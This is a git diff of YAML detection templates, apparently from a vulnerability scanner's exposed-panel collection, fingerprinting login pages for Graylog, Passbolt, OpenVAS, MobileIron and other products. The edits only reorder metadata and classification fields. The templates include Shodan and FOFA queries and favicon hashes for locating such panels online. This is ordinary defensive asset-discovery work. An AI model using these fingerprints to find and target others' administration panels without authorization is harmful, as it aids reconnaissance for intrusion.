- cpe: cpe:2.3:a:graylog:graylog:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -29,4 +29,5 @@ http:
- 'status_code == 200'
- 'contains(body, "Graylog Web Interface")'
condition: and
-# digest: 4a0a004730450221008f995ce3c7b298c705668fcac73cd8f3957aa6dd1ac1b0200169f67e781137d40220035b58544c2f27fdd5ed1f00737a58e28617c983fd66692a878f750a77212494:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450221008f995ce3c7b298c705668fcac73cd8f3957aa6dd1ac1b0200169f67e781137d40220035b58544c2f27fdd5ed1f00737a58e28617c983fd66692a878f750a77212494:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/ibm/ibm-odm-panel.yaml b/http/exposed-panels/ibm/ibm-odm-panel.yaml
index d7393ef61d..15a4d02d1a 100644
--- a/http/exposed-panels/ibm/ibm-odm-panel.yaml
+++ b/http/exposed-panels/ibm/ibm-odm-panel.yaml
@@ -9,17 +9,17 @@ info:
reference:
- https://www.ibm.com/docs/en/odm/8.12.0
- https://www.ibm.com/products/operational-decision-manager
+ classification:
+ cpe: cpe:2.3:a:ibm:operational_decision_manager:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- fofa-query: title="Decision Center | Business Console"
- shodan-query: http.title:"Decision Center | Business Console"
- product: operational_decision_manager
vendor: ibm
+ product: operational_decision_manager
+ shodan-query: http.title:"Decision Center | Business Console"
+ fofa-query: title="Decision Center | Business Console"
tags: panel,ibm,login,detect,decision-center
- classification:
- cpe: cpe:2.3:a:ibm:operational_decision_manager:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -45,4 +45,5 @@ http:
group: 1
regex:
- '(?i)"js/dist/([0-9.]+)/decisioncenter"'
-# digest: 4b0a00483046022100a3bb9b73dd48cfb52e57e67ee4156d19e151b1439e4b96bb629b532dfc182814022100e1a582afd40b108522924ce3382f701b04da9374b1e0a5945abcbe7d933a576e:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100a3bb9b73dd48cfb52e57e67ee4156d19e151b1439e4b96bb629b532dfc182814022100e1a582afd40b108522924ce3382f701b04da9374b1e0a5945abcbe7d933a576e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/isams-panel.yaml b/http/exposed-panels/isams-panel.yaml
index 95bcd5f6c0..8fd0e323b0 100644
--- a/http/exposed-panels/isams-panel.yaml
+++ b/http/exposed-panels/isams-panel.yaml
@@ -8,16 +8,16 @@ info:
iSAMS was detected.
reference:
- https://www.isams.com/platform/the-platform
+ classification:
+ cpe: cpe:2.3:a:iris:isams:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.favicon.hash:-81573405
- product: isams
vendor: iris
+ product: isams
+ shodan-query: http.favicon.hash:-81573405
tags: panel,isams,login
- classification:
- cpe: cpe:2.3:a:iris:isams:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -45,4 +45,5 @@ http:
group: 1
regex:
- 'Version ([0-9\.]+)'
-# digest: 4b0a00483046022100e171cb45841ba1e9060e04b4c12334c376ebb29cd7d9e6571583539549963c54022100cc61c700f49d109869795aadb4a0c668a48a2a8c9a48b192a2310e61ab4acd9f:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100e171cb45841ba1e9060e04b4c12334c376ebb29cd7d9e6571583539549963c54022100cc61c700f49d109869795aadb4a0c668a48a2a8c9a48b192a2310e61ab4acd9f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/jsherp-boot-panel.yaml b/http/exposed-panels/jsherp-boot-panel.yaml
index 392cffd23c..9e31960fba 100644
--- a/http/exposed-panels/jsherp-boot-panel.yaml
+++ b/http/exposed-panels/jsherp-boot-panel.yaml
@@ -4,16 +4,16 @@ info:
name: JshERP Boot Panel - Detect
author: DhiyaneshDk
severity: info
+ classification:
+ cpe: cpe:2.3:a:jishenghua:jsherp:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.favicon.hash:-1298131932
- product: jsherp
vendor: jishenghua
+ product: jsherp
+ shodan-query: http.favicon.hash:-1298131932
tags: panel,jsherp,login,detect
- classification:
- cpe: cpe:2.3:a:jishenghua:jsherp:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -31,4 +31,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100bec80af72f2ea8cbabcb3a071ec454962105327ef75676ad2b63b2ef3369d3c9022100c37f117430984d1abf270ea697e2eaffdfd7f2ff001f5fc52e2facc9d23e2d3f:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100bec80af72f2ea8cbabcb3a071ec454962105327ef75676ad2b63b2ef3369d3c9022100c37f117430984d1abf270ea697e2eaffdfd7f2ff001f5fc52e2facc9d23e2d3f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/kiali-panel.yaml b/http/exposed-panels/kiali-panel.yaml
index 801399ec14..f6bbd65d70 100644
--- a/http/exposed-panels/kiali-panel.yaml
+++ b/http/exposed-panels/kiali-panel.yaml
@@ -8,16 +8,16 @@ info:
kiali panel was detected.
reference:
- https://kiali.io/
+ classification:
+ cpe: cpe:2.3:a:kiali:kiali:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: title:"Kiali"
- product: kiali
vendor: kiali
+ product: kiali
+ shodan-query: title:"Kiali"
tags: panel,kiali,detect,login
- classification:
- cpe: cpe:2.3:a:kiali:kiali:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -40,4 +40,5 @@ http:
group: 1
regex:
- '(?i)"Kiali version":\s*"([a-z0-9.]+)"'
-# digest: 4b0a00483046022100ac3d039616a98589e8fc1bdf2e20f180157d17b0261e2b32feb03f230a173010022100f493934172a48f156b2938a1b16ff870fed6e624c9480f4f9535b3d70d8a4f4b:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100ac3d039616a98589e8fc1bdf2e20f180157d17b0261e2b32feb03f230a173010022100f493934172a48f156b2938a1b16ff870fed6e624c9480f4f9535b3d70d8a4f4b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/koel-panel.yaml b/http/exposed-panels/koel-panel.yaml
index 84a5978c64..27ff0f41b4 100644
--- a/http/exposed-panels/koel-panel.yaml
+++ b/http/exposed-panels/koel-panel.yaml
@@ -9,16 +9,16 @@ info:
reference:
- https://koel.dev/
- https://github.com/koel/koel
+ classification:
+ cpe: cpe:2.3:a:koel:koel:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Koel"
- product: koel
vendor: koel
+ product: koel
+ shodan-query: title:"Koel"
tags: panel,koel,login
- classification:
- cpe: cpe:2.3:a:koel:koel:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -26,6 +26,7 @@ http:
host-redirects: true
max-redirects: 2
+
matchers-condition: and
matchers:
- type: word
@@ -37,4 +38,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100aafee86cdccec6ee1063eed9beb3d7e0921ccfc7c6e7f4f30b3cf2a8cc908b120220232fd390696ddd45283573ea79cccce1a9ddaac111d0546a2e3385651cac3cbd:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100aafee86cdccec6ee1063eed9beb3d7e0921ccfc7c6e7f4f30b3cf2a8cc908b120220232fd390696ddd45283573ea79cccce1a9ddaac111d0546a2e3385651cac3cbd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/kopano-webapp-panel.yaml b/http/exposed-panels/kopano-webapp-panel.yaml
index e921310f0d..e47b571bcb 100644
--- a/http/exposed-panels/kopano-webapp-panel.yaml
+++ b/http/exposed-panels/kopano-webapp-panel.yaml
@@ -7,16 +7,16 @@ info:
description: Kopano WebApp login panel was detected.
reference:
- https://kopano.com/
+ classification:
+ cpe: cpe:2.3:a:kopano:webapp:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.title:"Kopano WebApp"
- product: webapp
vendor: kopano
+ product: webapp
+ shodan-query: http.title:"Kopano WebApp"
tags: panel,kopano,login,detect
- classification:
- cpe: cpe:2.3:a:kopano:webapp:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -24,7 +24,6 @@ http:
host-redirects: true
max-redirects: 2
-
matchers:
- type: dsl
dsl:
@@ -38,4 +37,5 @@ http:
group: 1
regex:
- '\?kv([0-9.]+)"'
-# digest: 490a0046304402200559bf199955583fef50d4c9989c34ce5f3b9d7221b3eb6b2b2f87c65db2e28602204c7ea66ac0009f31daf9e1e9ef8d1bc04635b1e0d59403ab76261bd6d3c6f623:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402200559bf199955583fef50d4c9989c34ce5f3b9d7221b3eb6b2b2f87c65db2e28602204c7ea66ac0009f31daf9e1e9ef8d1bc04635b1e0d59403ab76261bd6d3c6f623:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/label-studio-panel.yaml b/http/exposed-panels/label-studio-panel.yaml
index 394fff0f40..30b241cc87 100644
--- a/http/exposed-panels/label-studio-panel.yaml
+++ b/http/exposed-panels/label-studio-panel.yaml
@@ -6,16 +6,16 @@ info:
severity: info
description: |
Detects the presence of the Label Studio Login Page.
+ classification:
+ cpe: cpe:2.3:a:heartex:label_studio:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.favicon.hash:-1649949475
- product: label_studio
vendor: heartex
+ product: label_studio
+ shodan-query: http.favicon.hash:-1649949475
tags: label-studio,login,panel
- classification:
- cpe: cpe:2.3:a:heartex:label_studio:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -34,4 +34,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100da0538ebf234b3ca93efd0bf3045e2a8b6c49395e974ac845148157e7c3cd9ce02206fac9755a420d427132aab8074e5a88f112ac6a1388cf9c565946cd101acf5be:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100da0538ebf234b3ca93efd0bf3045e2a8b6c49395e974ac845148157e7c3cd9ce02206fac9755a420d427132aab8074e5a88f112ac6a1388cf9c565946cd101acf5be:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/librephotos-panel.yaml b/http/exposed-panels/librephotos-panel.yaml
index 8b7ea8368b..7cf442a9fe 100644
--- a/http/exposed-panels/librephotos-panel.yaml
+++ b/http/exposed-panels/librephotos-panel.yaml
@@ -6,16 +6,16 @@ info:
severity: info
reference:
- https://github.com/LibrePhotos/librephotos
+ classification:
+ cpe: cpe:2.3:a:librephotos_project:librephotos:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"LibrePhotos"
- product: librephotos
vendor: librephotos_project
+ product: librephotos
+ shodan-query: title:"LibrePhotos"
tags: panel,librephotos,detect,login
- classification:
- cpe: cpe:2.3:a:librephotos_project:librephotos:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -32,4 +32,5 @@ http:
status:
- 200
- 404
-# digest: 4a0a00473045022100ac7ab2163e3fe81bf44a7f0f39bc5cca173e38c9edf3db89757ed23af103255b02203e835eb224bae8e1950208986e6c298f9d57da2e5de0e1d059af590a46c1971d:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100ac7ab2163e3fe81bf44a7f0f39bc5cca173e38c9edf3db89757ed23af103255b02203e835eb224bae8e1950208986e6c298f9d57da2e5de0e1d059af590a46c1971d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/mitel-micollab-panel.yaml b/http/exposed-panels/mitel-micollab-panel.yaml
index 2dac80fdf0..8f6665c7e0 100644
--- a/http/exposed-panels/mitel-micollab-panel.yaml
+++ b/http/exposed-panels/mitel-micollab-panel.yaml
@@ -8,16 +8,16 @@ info:
Mitel MiCollab login panel was detected.
reference:
- https://www.mitel.com/products/micollab-miteam-meetings-collaboration-software
+ classification:
+ cpe: cpe:2.3:a:mitel:micollab:*:*:*:*:-:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.html:"MiCollab End User Portal"
- product: micollab
vendor: mitel
+ product: micollab
+ shodan-query: http.html:"MiCollab End User Portal"
tags: panel,mitel,login,detect
- classification:
- cpe: cpe:2.3:a:mitel:micollab:*:*:*:*:-:*:*:*
http:
- method: GET
path:
@@ -29,4 +29,5 @@ http:
- 'status_code == 200'
- 'contains_any(to_lower(body), "micollab", "mitel_logo", "com.mitel.mas.portal.domain")'
condition: and
-# digest: 4a0a004730450220361282e6b1e66774165622e644199d357d79481ff44547955f4ae1bb69edeefa022100a3f72f32ee02767e239bd7ec39baee800d3c3cce8b2eddd75b477ce2d4b92236:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450220361282e6b1e66774165622e644199d357d79481ff44547955f4ae1bb69edeefa022100a3f72f32ee02767e239bd7ec39baee800d3c3cce8b2eddd75b477ce2d4b92236:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/mobileiron-sentry.yaml b/http/exposed-panels/mobileiron-sentry.yaml
index bd58c6943d..fdb353ea27 100644
--- a/http/exposed-panels/mobileiron-sentry.yaml
+++ b/http/exposed-panels/mobileiron-sentry.yaml
@@ -7,16 +7,16 @@ info:
description: MobileIron Sentry panel was detected.
reference:
- https://help.ivanti.com/mi/help/en_us/sntry/9.9.0/gdcl/Content/SentryGuide/MobileIron_Sentry_overvi.htm
+ classification:
+ cpe: cpe:2.3:a:mobileiron:sentry:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.favicon.hash:967636089
- product: sentry
vendor: mobileiron
+ product: sentry
+ shodan-query: http.favicon.hash:967636089
tags: panel,mobileiron
- classification:
- cpe: cpe:2.3:a:mobileiron:sentry:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -32,4 +32,5 @@ http:
group: 1
regex:
- \?([\d.]+)"
-# digest: 4a0a004730450220450cf4f172df2c9696767fc8673981f62f8f8e00d0ed029ac8159b72651c9b9b02210088874dd29ec9b437e6448216863a7cd7a2c0e91dff0dfa9a0c9e0173ba72975f:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450220450cf4f172df2c9696767fc8673981f62f8f8e00d0ed029ac8159b72651c9b9b02210088874dd29ec9b437e6448216863a7cd7a2c0e91dff0dfa9a0c9e0173ba72975f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/monitorr-panel.yaml b/http/exposed-panels/monitorr-panel.yaml
index 5b5c0359cc..2f92900982 100644
--- a/http/exposed-panels/monitorr-panel.yaml
+++ b/http/exposed-panels/monitorr-panel.yaml
@@ -4,17 +4,17 @@ info:
name: Monitorr Panel - Detect
author: ritikchaddha
severity: info
+ classification:
+ cpe: cpe:2.3:a:monitorr:monitorr:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
+ vendor: monitorr
+ product: monitorr
shodan-query: http.favicon.hash:-211006074
fofa-query: icon_hash="-211006074"
- product: monitorr
- vendor: monitorr
tags: panel,monitorr,detect
- classification:
- cpe: cpe:2.3:a:monitorr:monitorr:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -26,4 +26,5 @@ http:
- 'status_code == 200'
- 'contains_any(body, "content=\"Monitorr", "Monitorr is loading", "title=\"Monitorr Settings")'
condition: and
-# digest: 4a0a0047304502210096e5fe7b74f97663c17f793bb7618f9cf72bbdfadc19a29c0a67629c7263a2ea02207c1e354330ad62a80cc115055fbac9b0f8807ee24740ed3fa82acbdefa0dad84:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502210096e5fe7b74f97663c17f793bb7618f9cf72bbdfadc19a29c0a67629c7263a2ea02207c1e354330ad62a80cc115055fbac9b0f8807ee24740ed3fa82acbdefa0dad84:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/moodle-workplace-panel.yaml b/http/exposed-panels/moodle-workplace-panel.yaml
index 39a8a1c0b2..ec2753fe5e 100644
--- a/http/exposed-panels/moodle-workplace-panel.yaml
+++ b/http/exposed-panels/moodle-workplace-panel.yaml
@@ -8,16 +8,16 @@ info:
Moodle workplace login panel was detected.
reference:
- https://moodle.com/solutions/workplace/
+ classification:
+ cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.html:"moodle"
- product: moodle
vendor: moodle
+ product: moodle
+ shodan-query: http.html:"moodle"
tags: panel,moodle,login,detect
- classification:
- cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -29,4 +29,5 @@ http:
- 'status_code == 200'
- 'contains_any(body, "content=\"moodle", "\"name\":\"moodle\"") && contains(body, "workplace")'
condition: and
-# digest: 4b0a00483046022100c975213bd6444fe2e0b59d65b699c5ed2a41a14acee0900fa844926960f3004e022100894f4ecff202d0d03c259b3615ba576ab2c5235292abfd19feb23fb13d0b7b9f:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100c975213bd6444fe2e0b59d65b699c5ed2a41a14acee0900fa844926960f3004e022100894f4ecff202d0d03c259b3615ba576ab2c5235292abfd19feb23fb13d0b7b9f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/n8n-panel.yaml b/http/exposed-panels/n8n-panel.yaml
index fdcb667598..eff9b03fe4 100644
--- a/http/exposed-panels/n8n-panel.yaml
+++ b/http/exposed-panels/n8n-panel.yaml
@@ -8,16 +8,16 @@ info:
The worlds most popular workflow automation platform for technical teams
reference:
- https://n8n.io/
+ classification:
+ cpe: cpe:2.3:a:n8n:n8n:*:*:*:*:node.js:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.favicon.hash:-831756631
- product: n8n
vendor: n8n
+ product: n8n
+ shodan-query: http.favicon.hash:-831756631
tags: panel,n8n,login,detect
- classification:
- cpe: cpe:2.3:a:n8n:n8n:*:*:*:*:node.js:*:*:*
http:
- method: GET
path:
@@ -34,4 +34,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a004830460221009cad1769a5b822269a5ac8dfdcbd4ead3932de47114219e72aaf5ce500d9516402210081a1c778151e62aa75f7ee379714349dda4db40844e59b92932d95cd8d6771f3:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a004830460221009cad1769a5b822269a5ac8dfdcbd4ead3932de47114219e72aaf5ce500d9516402210081a1c778151e62aa75f7ee379714349dda4db40844e59b92932d95cd8d6771f3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/netflow-analyzer-panel.yaml b/http/exposed-panels/netflow-analyzer-panel.yaml
index 4939419828..c858f5edaf 100644
--- a/http/exposed-panels/netflow-analyzer-panel.yaml
+++ b/http/exposed-panels/netflow-analyzer-panel.yaml
@@ -4,16 +4,16 @@ info:
name: Netflow Analyzer Login - Panel
author: DhiyaneshDk
severity: info
- metadata:
- shodan-query: html:"Login - Netflow Analyzer"
- verified: true
- max-request: 1
- product: manageengine_netflow_analyzer
- vendor: zohocorp
- tags: netflow,analyzer,panel,login
-
classification:
cpe: cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: zohocorp
+ product: manageengine_netflow_analyzer
+ shodan-query: html:"Login - Netflow Analyzer"
+ tags: netflow,analyzer,panel,login
+
http:
- raw:
- |
@@ -30,4 +30,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100d88f87529eb06a2012cd5e6d7f13e08f3e4863a538853b272ffc358fedbc2e9e022100d6e46704bbe4098aba415834c8e422c176af1a3dbe82a4d43c8b5d511abb3a20:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100d88f87529eb06a2012cd5e6d7f13e08f3e4863a538853b272ffc358fedbc2e9e022100d6e46704bbe4098aba415834c8e422c176af1a3dbe82a4d43c8b5d511abb3a20:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/nocodb-panel.yaml b/http/exposed-panels/nocodb-panel.yaml
index 07d08c657f..3b0b102269 100644
--- a/http/exposed-panels/nocodb-panel.yaml
+++ b/http/exposed-panels/nocodb-panel.yaml
@@ -9,16 +9,16 @@ info:
reference:
- https://www.nocodb.com/
- https://docs.nocodb.com/
+ classification:
+ cpe: cpe:2.3:a:xgenecloud:nocodb:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: "http.favicon.hash:206985584"
- product: nocodb
vendor: xgenecloud
+ product: nocodb
+ shodan-query: "http.favicon.hash:206985584"
tags: panel,nocodb,login,detect
- classification:
- cpe: cpe:2.3:a:xgenecloud:nocodb:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -26,6 +26,7 @@ http:
- "{{BaseURL}}/dashboard/favicon.ico"
stop-at-first-match: true
+
matchers-condition: or
matchers:
- type: word
@@ -37,4 +38,5 @@ http:
- type: dsl
dsl:
- "status_code==200 && (\"206985584\" == mmh3(base64_py(body)))"
-# digest: 490a00463044022059727c364fc039e006b06bcb90e03466b1396360220a8a5bb0f11d53a5009b35022002ddfb487c4289edae9a37ced37b7a0094ef5689aa2b6ac30964ff0f40936df7:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a00463044022059727c364fc039e006b06bcb90e03466b1396360220a8a5bb0f11d53a5009b35022002ddfb487c4289edae9a37ced37b7a0094ef5689aa2b6ac30964ff0f40936df7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/openedge-panel.yaml b/http/exposed-panels/openedge-panel.yaml
index c97d8d51bf..55b4c627ec 100644
--- a/http/exposed-panels/openedge-panel.yaml
+++ b/http/exposed-panels/openedge-panel.yaml
@@ -6,16 +6,16 @@ info:
severity: info
description: |
An OpenEdge login panel was detected.
- metadata:
- shodan-query: html:"Welcome to Progress Application Server for OpenEdge"
- verified: true
- max-request: 1
- product: openedge
- vendor: progress
- tags: panel,openedge,login,detect
-
classification:
cpe: cpe:2.3:a:progress:openedge:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: progress
+ product: openedge
+ shodan-query: html:"Welcome to Progress Application Server for OpenEdge"
+ tags: panel,openedge,login,detect
+
http:
- method: GET
path:
@@ -31,4 +31,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100d1045ca0024a3d2b57ca98df6db2680069b9bbe618487857397156b0331d2dcb0220687d22237d900ece4955ac20d2c9f67b9b0d0a831edbcbf28d6503bd4e487727:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100d1045ca0024a3d2b57ca98df6db2680069b9bbe618487857397156b0331d2dcb0220687d22237d900ece4955ac20d2c9f67b9b0d0a831edbcbf28d6503bd4e487727:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/openvas-panel.yaml b/http/exposed-panels/openvas-panel.yaml
index 8bdf2c1167..7ded3e423f 100644
--- a/http/exposed-panels/openvas-panel.yaml
+++ b/http/exposed-panels/openvas-panel.yaml
@@ -8,16 +8,16 @@ info:
An OpenVas Admin login panel was detected.
reference:
- https://openvas.org/
+ classification:
+ cpe: cpe:2.3:a:openvas:openvas_manager:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.favicon.hash:1606029165
- product: openvas_manager
vendor: openvas
+ product: openvas_manager
+ shodan-query: http.favicon.hash:1606029165
tags: panel,openvas,admin,login
- classification:
- cpe: cpe:2.3:a:openvas:openvas_manager:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -36,4 +36,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100c89b794d3da387a0b04031eb0b5de602460741e4ba4895474dfb0921df4aa307022049fb34e63c9cf59a957d41b69ecf1452c8ed9293bafc74dbeadbb84cfb707ba6:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100c89b794d3da387a0b04031eb0b5de602460741e4ba4895474dfb0921df4aa307022049fb34e63c9cf59a957d41b69ecf1452c8ed9293bafc74dbeadbb84cfb707ba6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/oracle-ebusiness-panel.yaml b/http/exposed-panels/oracle-ebusiness-panel.yaml
index 41677af723..a87e8c1507 100644
--- a/http/exposed-panels/oracle-ebusiness-panel.yaml
+++ b/http/exposed-panels/oracle-ebusiness-panel.yaml
@@ -8,16 +8,16 @@ info:
Oracle E-Business Suite login panel was detected.
reference:
- https://www.oracle.com/applications/ebusiness/
+ classification:
+ cpe: cpe:2.3:a:oracle:e-business_suite:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.html:"Oracle UIX"
- product: e-business_suite
vendor: oracle
+ product: e-business_suite
+ shodan-query: http.html:"Oracle UIX"
tags: panel,oracle,login,detect
- classification:
- cpe: cpe:2.3:a:oracle:e-business_suite:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -25,7 +25,6 @@ http:
redirects: true
max-redirects: 2
-
matchers:
- type: dsl
dsl:
@@ -39,4 +38,5 @@ http:
group: 1
regex:
- '(?i)/OA_HTML/cabo/oajsLibs/oafcore([A-Z0-9]+).js'
-# digest: 4a0a00473045022100c2d6e8e3ce8ee5591c514fe83e3b5e87117757540fd00c7e89f532f3ffc93bd502204d33d1e6f2e9f52a95ada84d8fd2b1fc188c6e3a2b9153b6004d90885e40646f:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100c2d6e8e3ce8ee5591c514fe83e3b5e87117757540fd00c7e89f532f3ffc93bd502204d33d1e6f2e9f52a95ada84d8fd2b1fc188c6e3a2b9153b6004d90885e40646f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/outsystems-servicecenter-panel.yaml b/http/exposed-panels/outsystems-servicecenter-panel.yaml
index 1006091418..e55b85ebfc 100644
--- a/http/exposed-panels/outsystems-servicecenter-panel.yaml
+++ b/http/exposed-panels/outsystems-servicecenter-panel.yaml
@@ -8,16 +8,16 @@ info:
OutSystems Service Center login panel was detected.
reference:
- https://www.outsystems.com/
+ classification:
+ cpe: cpe:2.3:a:outsystems:platform_server:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: "http.html:\"outsystems\""
- product: platform_server
vendor: outsystems
+ product: platform_server
+ shodan-query: "http.html:\"outsystems\""
tags: panel,outsystems,login,detect
- classification:
- cpe: cpe:2.3:a:outsystems:platform_server:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -40,4 +40,5 @@ http:
group: 1
regex:
- 'environmentName:.?([a-z0-9A-Z\s]+).?'
-# digest: 4b0a00483046022100b561430758a0cf58edbf3bef078e66e32075286652260a4db6e3486d1962ef16022100a7239cd818f68cca62f8c16189723de1574d542908852c92cbbc5d86074c06a5:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100b561430758a0cf58edbf3bef078e66e32075286652260a4db6e3486d1962ef16022100a7239cd818f68cca62f8c16189723de1574d542908852c92cbbc5d86074c06a5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/passbolt-panel.yaml b/http/exposed-panels/passbolt-panel.yaml
index 5bb8e177d7..1fc6fd5b3e 100644
--- a/http/exposed-panels/passbolt-panel.yaml
+++ b/http/exposed-panels/passbolt-panel.yaml
@@ -8,16 +8,16 @@ info:
Passbolt login panel was detected.
reference:
- https://www.passbolt.com/
+ classification:
+ cpe: cpe:2.3:a:passbolt:passbolt_api:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.title:"Passbolt | Open source password manager for teams"
- product: passbolt_api
vendor: passbolt
+ product: passbolt_api
+ shodan-query: http.title:"Passbolt | Open source password manager for teams"
tags: panel,passbolt,login
- classification:
- cpe: cpe:2.3:a:passbolt:passbolt_api:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -36,4 +36,5 @@ http:
group: 1
regex:
- '(?i)v=([0-9a-z.-]+)'
-# digest: 4a0a00473045022100a88014cf962ec6f61e44d7dbe62cef11b6b5a22d5110345bdaaa9b10872089f20220551fd9f9a94363c082c57e1f5618537241e20297383a8313ff2bf7ef0317111c:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100a88014cf962ec6f61e44d7dbe62cef11b6b5a22d5110345bdaaa9b10872089f20220551fd9f9a94363c082c57e1f5618537241e20297383a8313ff2bf7ef0317111c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/phpldapadmin-panel.yaml b/http/exposed-panels/phpldapadmin-panel.yaml
index be97e98ba2..0d9107333d 100644
--- a/http/exposed-panels/phpldapadmin-panel.yaml
+++ b/http/exposed-panels/phpldapadmin-panel.yaml
@@ -4,16 +4,16 @@ info:
name: PHP LDAP Admin Panel - Detect
author: ritikchaddha,DhiyaneshDk
severity: info
+ classification:
+ cpe: cpe:2.3:a:phpldapadmin_project:phpldapadmin:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
- shodan-query: title:"phpLDAPadmin"
- product: phpldapadmin
vendor: phpldapadmin_project
+ product: phpldapadmin
+ shodan-query: title:"phpLDAPadmin"
tags: php,phpldapadmin,panel,detect
- classification:
- cpe: cpe:2.3:a:phpldapadmin_project:phpldapadmin:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -41,4 +41,5 @@ http:
group: 1
regex:
- '([0-9.]+)<\/div>'
